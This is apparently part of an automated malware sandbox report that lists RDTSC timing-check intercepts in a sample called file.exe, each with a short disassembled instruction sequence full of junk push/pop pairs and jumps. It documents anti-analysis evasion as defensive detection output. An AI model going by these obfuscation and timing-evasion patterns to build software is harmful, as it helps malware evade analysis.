                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1E5 second address: A4E1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1EB second address: A4E2A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB9C8D34AF8h 0x0000000e nop 0x0000000f jo 00007FB9C8D34AECh 0x00000015 mov ebx, dword ptr [ebp+122D2561h] 0x0000001b xor dword ptr [ebp+122D19B4h], ebx 0x00000021 push dword ptr fs:[00000000h] 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FB9C8D34AE8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov edi, ecx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov di, si 0x0000004e mov eax, dword ptr [ebp+122D11EDh] 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007FB9C8D34AE8h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e mov ebx, 2C1A5093h 0x00000073 and edi, dword ptr [ebp+1245C4F8h] 0x00000079 push FFFFFFFFh 0x0000007b jp 00007FB9C8D34AF2h 0x00000081 push eax 0x00000082 jng 00007FB9C8D34AEEh 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50066 second address: A5006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04A4F second address: A04A59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9C8D34AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A500 second address: A9A533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB9C8FCDCC1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EF6C second address: A3EF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3A45 second address: AA3A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2710 second address: AA2714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2714 second address: AA2733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9C8FCDCB3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2733 second address: AA2737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2737 second address: AA2756 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9C8FCDCA6h 0x00000008 jmp 00007FB9C8FCDCABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 js 00007FB9C8FCDCB0h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2F21 second address: AA2F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA34E9 second address: AA3517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 jmp 00007FB9C8FCDCB4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A87 second address: AA6A9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB9C8FCBEA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A9E second address: AA6AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6AA9 second address: AA6AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6DB8 second address: AA6DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6DBE second address: AA6DC8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9C8FCBE96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA70AE second address: AA70B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA70B2 second address: AA70C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9C8FCBE9Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA763E second address: AA7648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9C8FCDCA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDD20 second address: 9FDD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CD1 second address: AB3CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB9C8FCDCA6h 0x0000000a popad 0x0000000b jmp 00007FB9C8FCDCAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CEE second address: AB3CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4437 second address: AB4458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 ja 00007FB9C8FCDCA6h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4458 second address: AB445E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AE6 second address: AB4AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AEA second address: AB4AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51EC second address: AB51F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51F0 second address: AB51F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51F6 second address: AB5202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB59E9 second address: AB5A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA1h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB9C8FCBE96h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3881 second address: AB3885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3885 second address: AB38A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCBE96h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB9C8FCBE9Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB09C second address: ABB0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0A0 second address: ABB0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0A6 second address: ABB0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0AC second address: ABB0B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB1E8 second address: ABB1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7C71 second address: AC7C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 js 00007FB9C8FCBEA0h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACBD70 second address: ACBD7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95BF second address: AD95C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95C4 second address: AD95E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95E1 second address: AD95E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE40ED second address: AE410B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB9C8FCDCB1h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE410B second address: AE4117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2D0B second address: AE2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FB9C8FCDCA6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2D22 second address: AE2D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2E7A second address: AE2E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE32E8 second address: AE3307 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9C8FCBE96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FB9C8FCBE9Fh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3307 second address: AE330D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE789C second address: AE78A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78A0 second address: AE78A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78A9 second address: AE78AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78AF second address: AE78B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78B4 second address: AE78C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCBE9Ch 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF92 second address: AEDF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF96 second address: AEDF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF9A second address: AEDFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFA0 second address: AEDFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB9C8FCBEA3h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFC1 second address: AEDFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFC6 second address: AEDFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF65B second address: AEF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF660 second address: AEF665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7501 second address: AF752C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCDCB2h 0x00000009 popad 0x0000000a jl 00007FB9C8FCDCACh 0x00000010 je 00007FB9C8FCDCAEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085A5 second address: B085AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085AB second address: B085AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085AF second address: B085B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085B3 second address: B085B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085B9 second address: B085D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9C8FCBE9Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085D0 second address: B085D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1625D second address: B16261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16261 second address: B1627E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jo 00007FB9C8FCDCA6h 0x00000011 jmp 00007FB9C8FCDCABh 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1627E second address: B162A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9C8FCBE9Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B162A6 second address: B162AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B12 second address: B19B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCBEA8h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B30 second address: B19B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B34 second address: B19B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCBEA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E3F second address: B19E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E45 second address: B19E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E4D second address: B19E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E51 second address: B19E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A413 second address: B1A417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A417 second address: B1A41B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A41B second address: B1A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A426 second address: B1A42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A42C second address: B1A430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A430 second address: B1A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A43C second address: B1A446 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9C8FCDCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A82A second address: B1A82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A82F second address: B1A83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A83B second address: B1A865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9C8FCBEA9h 0x00000010 jg 00007FB9C8FCBE96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EBDE second address: B1EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EBE9 second address: B1EBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F145 second address: B1F1B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB9C8FCDCA8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+12473A80h] 0x0000002e push dword ptr [ebp+122D3005h] 0x00000034 jmp 00007FB9C8FCDCB5h 0x00000039 mov dh, 95h 0x0000003b call 00007FB9C8FCDCA9h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FB9C8FCDCB2h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1B6 second address: B1F1BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1BB second address: B1F1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FB9C8FCDCB0h 0x0000000e pushad 0x0000000f jnl 00007FB9C8FCDCA6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FB9C8FCDCA6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1E1 second address: B1F1EB instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8FCBE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1EB second address: B1F1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20AFB second address: B20B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCBEA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B12 second address: B20B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
